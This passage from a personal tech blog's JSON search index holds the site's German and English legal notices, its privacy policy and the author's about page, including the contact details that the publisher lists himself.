publizierten Inhalte stellen ausschließlich meine persönliche Meinung dar.\nBei etwaigen Überschneidungen mit meiner beruflichen Tätigkeit für die \u003ca href=\"https://www.vegardit.com\" target=\"_blank\"\u003eVegard IT GmbH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n sei daher darauf hingewiesen, dass es sich nicht um die Meinung meines Arbeitgebers handelt.“\u003c/p\u003e\n\u003ch2 id=\"verantwortlich-für-den-inhalt-nach--55-abs-2-rstv\"\u003eVerantwortlich für den Inhalt nach § 55 Abs. 2 RStV \u003ca href=\"#verantwortlich-f%c3%bcr-den-inhalt-nach--55-abs-2-rstv\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eChristoph Stoettner\u003c/p\u003e\n\u003ch3 id=\"haftung-für-inhalte\"\u003eHaftung für Inhalte \u003ca href=\"#haftung-f%c3%bcr-inhalte\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cp\u003eAls Diensteanbieter sind wir gemäß § 7 Abs.1 TMG für eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich.\nNach §§ 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, übermittelte oder gespeicherte fremde Informationen zu überwachen oder nach Umständen zu forschen, die auf eine rechtswidrige Tätigkeit hinweisen.\u003c/p\u003e","ref":"https://stoeps.de/legal/impressum/","title":"Impressum"},{"body":"Information based on § 5 TMG Christoph Stoettner\nWerlestraße 19\n64646 Heppenheim\nGermany\nContact Phone: +49 173 8588719\nE-Mail: christoph.stoettner@stoeps.de My opinion \u0026ldquo;This is my private blog. All statements and published content on this blog are exclusively my personal opinion. In case of possible overlaps with my professional activity for Vegard IT GmbH , I would therefore like to point out that this is not the opinion of my employer\u0026rdquo;.\nResponsible for the content according to § 55 Abs. 2 RStV Christoph Stoettner\nLimitation of liability for internal content The content of our website has been compiled with meticulous care and to the best of our knowledge. However, we cannot assume any liability for the up-to-dateness, completeness or accuracy of any of the pages.\nPursuant to section 7, para. 1 of the TMG (Telemediengesetz – Tele Media Act by German law), we as service providers are liable for our own content on these pages in accordance with general laws. However, pursuant to sections 8 to 10 of the TMG, we as service providers are not under obligation to monitor external information provided or stored on our website. Once we have become aware of a specific infringement of the law, we will immediately remove the content in question. Any liability concerning this matter can only be assumed from the point in time at which the infringement becomes known to us.\nLimitation of liability for external links Our website contains links to the websites of third parties („external links“). As the content of these websites is not under our control, we cannot assume any liability for such external content. In all cases, the provider of information of the linked websites is liable for the content and accuracy of the information provided. At the point in time when the links were placed, no infringements of the law were recognisable to us. As soon as an infringement of the law becomes known to us, we will immediately remove the link in question.\nCopyright The content and works published on this website are governed by the copyright laws of Germany.\nAll content created by me, Christoph Stoettner, is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License unless noted otherwise.\nYou are free to: Share — copy and redistribute the material in any medium or format\nAdapt — remix, transform, and build upon the material for any purpose, even commercially.\nThis license is acceptable for Free Cultural Works.\nThe licensor cannot revoke these freedoms as long as you follow the license terms.\nUnder the following terms: Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.\nShareAlike — If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original.\nNo additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.\nData protection A visit to our website can result in the storage on our server of information about the access (date, time, page accessed). This does not represent any analysis of personal data (e.g., name, address or e-mail address).\nWe would like to expressly point out that the transmission of data via the Internet (e.g., by e-mail) can offer security vulnerabilities. It is therefore impossible to safeguard the data completely against access by third parties. We cannot assume any liability for damages arising as a result of such security vulnerabilities.\nThe use by third parties of all published contact details for the purpose of advertising is expressly excluded. We reserve the right to take legal steps in the case of the unsolicited sending of advertising information; e.g., by means of spam mail.\nSource:\nhttp://www.mustervorlage.net/disclaimer-muster#Englisch[Disclaimer on Mustervorlage.net]\n","excerpt":"\u003ch2 id=\"information-based-on--5-tmg\"\u003eInformation based on § 5 TMG \u003ca href=\"#information-based-on--5-tmg\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eChristoph Stoettner\u003cbr\u003e\nWerlestraße 19\u003cbr\u003e\n64646 Heppenheim\u003cbr\u003e\nGermany\u003c/p\u003e\n\u003ch2 id=\"contact\"\u003eContact \u003ca href=\"#contact\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003ePhone: +49 173 8588719\u003cbr\u003e\nE-Mail: \u003ca href=\"mailto:christoph.stoettner@stoeps.de\"\u003echristoph.stoettner@stoeps.de\u003c/a\u003e\n\u003c/p\u003e\n\u003ch2 id=\"my-opinion\"\u003eMy opinion \u003ca href=\"#my-opinion\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003e\u0026ldquo;This is my private blog.\nAll statements and published content on this blog are exclusively my personal opinion.\nIn case of possible overlaps with my professional activity for \u003ca href=\"https://www.vegardit.com\" target=\"_blank\"\u003eVegard IT GmbH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, I would therefore like to point out that this is not the opinion of my employer\u0026rdquo;.\u003c/p\u003e\n\u003ch2 id=\"responsible-for-the-content-according-to--55-abs-2-rstv\"\u003eResponsible for the content according to § 55 Abs. 2 RStV \u003ca href=\"#responsible-for-the-content-according-to--55-abs-2-rstv\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eChristoph Stoettner\u003c/p\u003e\n\u003ch2 id=\"limitation-of-liability-for-internal-content\"\u003eLimitation of liability for internal content \u003ca href=\"#limitation-of-liability-for-internal-content\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eThe content of our website has been compiled with meticulous care and to the best of our knowledge.\nHowever, we cannot assume any liability for the up-to-dateness, completeness or accuracy of any of the pages.\u003c/p\u003e","ref":"https://stoeps.de/legal/legalnotice/","title":"Legal Notice"},{"body":"","excerpt":"","ref":"https://stoeps.de/legal/","title":"Legals"},{"body":"This Privacy Policy describes My policies and procedures on the collection, use and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.\nI use Your Personal data only for the comment system!\nInterpretation The words of which the initial letter is capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or in plural.\nDefinitions For the purposes of this Privacy Policy:\nCookies are small files that are placed on Your computer, mobile device or any other device by a website, containing the details of Your browsing history on that website among its many uses.\nCountry refers to: Hessen, Germany\nDevice means any device that can access the Service such as a computer, a cellphone or a digital tablet.\nPersonal Data is any information that relates to an identified or identifiable individual.\nService refers to the Website.\nService Provider means any natural or legal person who processes the data on behalf of me. It refers to third-party companies to facilitate the Service, to provide the Service on behalf of me, to perform services related to the Service.\nUsage Data refers to data collected automatically, either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).\nWebsite refers to stoeps, accessible from https://stoeps.de You means the individual accessing or using the Service, or the company, or other legal entity on behalf of which such individual is accessing or using the Service, as applicable.\nTypes of Data Collected Personal Data While using My Service, I may ask You to provide me with certain personally identifiable information that can be used to contact or identify You. Personally identifiable information includes:\nEmail address First name and last name Usage Data Usage Data is collected automatically when using the Service.\nThis service writes anonymized log files for troubleshooting, but we don\u0026rsquo;t use it for anything else.\nTracking Technologies and Cookies I do not use Cookies and similar tracking technologies to track the activity on My Service and store certain information.\nCookies or Browser Cookies. A cookie is a small file placed on Your Device. I do not store or read any cookie on Your device. Use of Your Personal Data You only have to provide personal data, if you use the commenting system! No personal data needs to be provided during you read any of the content.\nI may use Personal Data for the following purposes:\nValidate Comments I may share Your personal information in the following situations:\nWith Service Providers: I may share Your personal information with Service Providers to monitor and analyze the use of our Service, to contact You. With other users: when You share personal information in comments, such information may be viewed by all users and may be publicly distributed outside. Retention of Your Personal Data I will retain Your Personal Data only for as long as is necessary for the purposes set out in this Privacy Policy. I will retain and use Your Personal Data to the extent necessary to comply with our legal obligations (for example, if we are required to retain your data to comply with applicable laws), resolve disputes, and enforce our legal agreements and policies.\nI will take all steps reasonably necessary to ensure that Your data is treated securely and in accordance with this Privacy Policy and no transfer of Your Personal Data will take place to an organization or a country unless there are adequate controls in place including the security of Your data and other personal information.\nDisclosure of Your Personal Data Law enforcement Under certain circumstances, I may be required to disclose Your Personal Data if required to do so by law or in response to valid requests by public authorities (e.g. a court or a government agency).\nOther legal requirements I may disclose Your Personal Data in the good faith belief that such action is necessary to:\nComply with a legal obligation Protect and defend the rights or property of mine Prevent or investigate possible wrongdoing in connection with the Service Protect the personal safety of Users of the Service or the public Protect against legal liability Security of Your Personal Data The security of Your Personal Data is important to me, but remember that no method of transmission over the Internet, or method of electronic storage is 100% secure. While I strive to use commercially acceptable means to protect Your Personal Data, I cannot guarantee its absolute security.\nThe Service Providers I use may have access to Your Personal Data. These third-party vendors collect, store, use, process and transfer information about Your activity on My Service in accordance with their Privacy Policies.\nUsage, Performance and Miscellaneous I may use third-party Service Providers to provide better improvement of my Service.\nAkismet for spam protection Their Privacy Policy can be viewed at https://automattic.com/privacy/ IONOS Webhoster My Service does not address anyone under the age of 13. I do not knowingly collect personally identifiable information from anyone under the age of 13. If You are a parent or guardian and You are aware that Your child has provided Me with Personal Data, please contact Us. If I become aware that I have collected Personal Data from anyone under the age of 13 without verification of parental consent, I take steps to remove that information from My servers.\nIf I need to rely on consent as a legal basis for processing Your information and Your country requires consent from a parent, I may require Your parent\u0026rsquo;s consent before I collect and use that information.\nMy Service may contain links to other websites that are not operated by me. If You click on a third party link, You will be directed to that third party\u0026rsquo;s site. I strongly advise You to review the Privacy Policy of every site You visit.\nI have no control over and assume no responsibility for the content, privacy policies or practices of any third party sites or services.\nI may update My Privacy Policy from time to time. I will notify You of any changes by posting the new Privacy Policy on this page.\nI will update the \u0026ldquo;Last updated\u0026rdquo; date at the top of this Privacy Policy.\nYou are advised to review this Privacy Policy periodically for any changes. Changes to this Privacy Policy are effective when they are posted on this page.\nIf you have any questions about this Privacy Policy, You can contact us:\nBy email: webmaster@stoeps.de ","excerpt":"\u003cp\u003eThis Privacy Policy describes My policies and procedures on the collection, use and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eI use Your Personal data only for the comment system!\u003c/strong\u003e\u003c/p\u003e\n\u003ch2 id=\"interpretation\"\u003eInterpretation \u003ca href=\"#interpretation\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eThe words of which the initial letter is capitalized have meanings defined under the following conditions. The following definitions shall have the same meaning regardless of whether they appear in singular or in plural.\u003c/p\u003e\n\u003ch2 id=\"definitions\"\u003eDefinitions \u003ca href=\"#definitions\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eFor the purposes of this Privacy Policy:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCookies\u003c/strong\u003e are small files that are placed on Your computer, mobile device or any other device by a website, containing the details of Your browsing history on that website among its many uses.\u003c/p\u003e","ref":"https://stoeps.de/legal/datenschutz/","title":"Privacy Policy"},{"body":"","excerpt":"","ref":"https://stoeps.de/posts/","title":""},{"body":"I work at Vegard IT GmbH as a senior consultant with a focus on collaboration software, Kubernetes, security and automation. I mainly deal with HCL Connections, WebSphere Application Server, Kubernetes, Ansible, Terraform and Linux.\nSometimes my daily work results in technical talks and blog articles, which you can follow here more or less regularly. You can find the presentations in the main menu under public speaking .\nI created a list of tools I use regularly, most of which have been released under an open source license.\nIn my spare time I read a lot, test all kinds of technical software and gadgets and try to follow about 200 RSS feeds. Here you can find a collection of them. This is my private blog, all opinions are my own.\nLink collection I save links I want to read later or store because they are interesting in Shaarli .\nShaarli delivers a nice overview of links on daily , weekly and monthly basis. Or you check the Tag cloud when you\u0026rsquo;re interested in special topics.\nI try to add some description to each link, so I don\u0026rsquo;t need to create the linkdump posts.\nWhy is the domain name stoeps? This is a very old story and it started in school. Stoeps was just my nickname and I have kept it ever since.\nContact PGP Key Fingerprint: 641C D2C7 4596 010D 5843 4863 7704 D09C E996 50FC \\ Mail address: christoph.stoettner (at) stoeps.de Signal stoeps.13 Matrix @stoeps:matrix.org Threema MBXU92A6 Copyright Some rights reserved All content created by me, is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License unless noted otherwise Credits This blog is generated with Hugo and uses\nBootstrap 5 Line Awesome Stockimages from Unsplash used for category overview: NASA Alexandre Pellaes Mika Baumeister Ashim D’Silva Mikita Yo FLY:D Ilyass SEDDOUG Markus Spiske ","excerpt":"\u003cp\u003eI work at \u003ca href=\"https://vegardit.com\" target=\"_blank\"\u003eVegard IT GmbH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n as a senior consultant with a focus on collaboration software, Kubernetes, security and automation. I mainly deal with HCL Connections, WebSphere Application Server, Kubernetes, Ansible, Terraform and Linux.\u003c/p\u003e\n\u003cp\u003eSometimes my daily work results in technical talks and blog articles, which you can follow here more or less regularly. You can find the presentations in the main menu under \u003ca href=\"/speaking/\"\u003epublic speaking\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI created a \u003ca href=\"/tiu\"\u003elist of tools I use\u003c/a\u003e\n regularly, most of which have been released under an open source license.\u003c/p\u003e\n\u003cp\u003eIn my spare time I read a lot, test all kinds of technical software and gadgets and try to follow about 200 RSS feeds.\n\u003ca href=\"/links\"\u003eHere you can find a collection of them.\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThis is my private blog, all opinions are my own.\u003c/strong\u003e\u003c/p\u003e","ref":"https://stoeps.de/authors/christoph-stoettner/","title":"Christoph Stoettner"},{"body":"","excerpt":"","ref":"https://stoeps.de/links/","title":"Links"},{"body":"","excerpt":"","ref":"https://stoeps.de/speaking/","title":"Public Speaking"},{"body":"","excerpt":"","ref":"https://stoeps.de/search/","title":"search"},{"body":"","excerpt":"","ref":"https://stoeps.de/tiu/","title":"Tools I Use"}]